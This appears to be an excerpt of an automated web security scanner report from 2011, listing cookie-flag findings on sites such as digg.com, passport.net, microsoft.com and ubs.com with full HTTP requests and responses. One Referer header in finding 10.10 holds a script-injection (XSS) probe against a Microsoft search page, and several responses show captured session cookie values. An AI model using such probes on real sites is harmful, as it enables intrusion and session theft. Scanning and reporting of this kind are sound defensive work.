Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1


9.44. http://rs.gwallet.com/r1/pixel/x369

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x369

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x369 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1


10. Cookie without HttpOnly flag set
There are 73 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://about.digg.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=96839786b8fdb7818a75089363be3cac; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17973


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.2. http://about.digg.com/ads

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /ads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=8d9cb78aa1d77381647579b491d16261; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7213
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.3. http://about.digg.com/blog

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /blog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=d3bd911c4412a5f105a30b014982aaed; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15614


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.4. http://about.digg.com/contact

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=183f9d06f7faf23f4425f2bca06ffba5; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7886
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.5. http://about.digg.com/faq

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /faq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faq HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=2eb23705fdf587154cd28b12c4d39ae6; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25290


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.6. http://about.digg.com/partnership

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /partnership

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partnership HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=81512413a75972f559239632a17b7d62; expires=Fri, 29-Jul-2011 14:54:35 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8103


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.7. http://about.digg.com/privacy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=5dae80891524c3f10a5dd8dcaee38263; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16757


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.8. http://about.digg.com/terms-use

Summary

Severity:   Low
Confidence:   Firm
Host:   http://about.digg.com
Path:   /terms-use

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms-use HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=790163a5d0bb3c66f0901f4df9eaeead; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24783


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.9. https://accountservices.passport.net/gethip.srf

Summary

Severity:   Low
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

10.10. http://c.microsoft.com/trans_pixel.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Microsoft%20Search%20Preferences%20Page&fi=1&fv=10.3&r=http%3A%2F%2Fburp%2Fshow%2F0&ts=1309951354314&sr=1920x1200&bs=1041x985 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1&mkt=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; mcI=Thu, 09 Jun 2011 16:24:17 GMT; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; s_vnum=1311213700142%26vn%3D2; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/21/2011 12:35:21&Microsoft.VisitStartDate=06/21/2011 12:32:03&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=29&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940116672:ss=1309940093261

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7fac793-ceeb-435f-829d-6351edfd89a3&Microsoft.CreationDate=07/06/2011 11:22:37&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.NumberOfVisits=2&SessionCookie.Id=26FDF2F789E3D4343E8A3F6065EE6BF1; domain=microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.VisitStartDate=07/06/2011 11:22:37&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=31&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Thu, 05-Jul-2012 11:22:38 GMT; path=/
Set-Cookie: MS0=3382a99b723844019751e1a79738c963; domain=.microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:22:38 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

10.11. http://developers.digg.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://developers.digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: developers.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESS395417e620b9b9b47288b47745f54be6=98edcda430c01adc5de44ed3b21784ec; expires=Fri, 29-Jul-2011 14:54:56 GMT; path=/; domain=.developers.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 5997
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.12. http://jobs.digg.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://jobs.digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: jobs.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSb35b189ffa137f2f4ba6e0ebbe3d6f9c=e8b60e479e4f64320ce8065cb6d3ca23; expires=Fri, 29-Jul-2011 15:10:31 GMT; path=/; domain=.jobs.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:37:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

10.13. http://knowledgelayer.softlayer.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://knowledgelayer.softlayer.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: knowledgelayer.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:00 GMT
Server: Apache
Set-Cookie: PHPSESSID=f5088c0e2e03edd7fff01fa38f08d18e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 38314
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!-- Start SoftLayerHeader -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>K
...[SNIP]...

10.14. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /awu/help/inter/en/ubsHelp.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /awu/help/inter/en/ubsHelp.htm HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:24 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1958
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_L9gle69HertpY5M1FA0n6S8Ha8hmI3x+G1EGHTEEbrittFE1; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/awu/help/inter/en/ubs
...[SNIP]...

10.15. https://nae.ubs.com/quotes

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /quotes

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:21 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1935
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_QnzyiVMmCmOuQc59lEBC6wIYAyv-NToCOLr+gbDJuPrkFe1I; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes">
</head>
<bod
...[SNIP]...

10.16. https://nae.ubs.com/quotes/markets_instruments

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /quotes/markets_instruments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes/markets_instruments HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:19 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1955
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_SX4z2ua6xceeMCGR3a5iZThqKGwm33qPdj7u-pf6nRdVUcxu; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instru
...[SNIP]...

10.17. http://ping.fm/ref/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ping.fm
Path:   /ref/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/ HTTP/1.1
Host: ping.fm
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Wed, 06 Jul 2011 11:21:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3p28cc2ebck30pasml0mp53is1; path=/
Content-Length: 0
Connection: close
Via: 1.1 AN-0016020121270012


10.18. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1183778&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:22:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
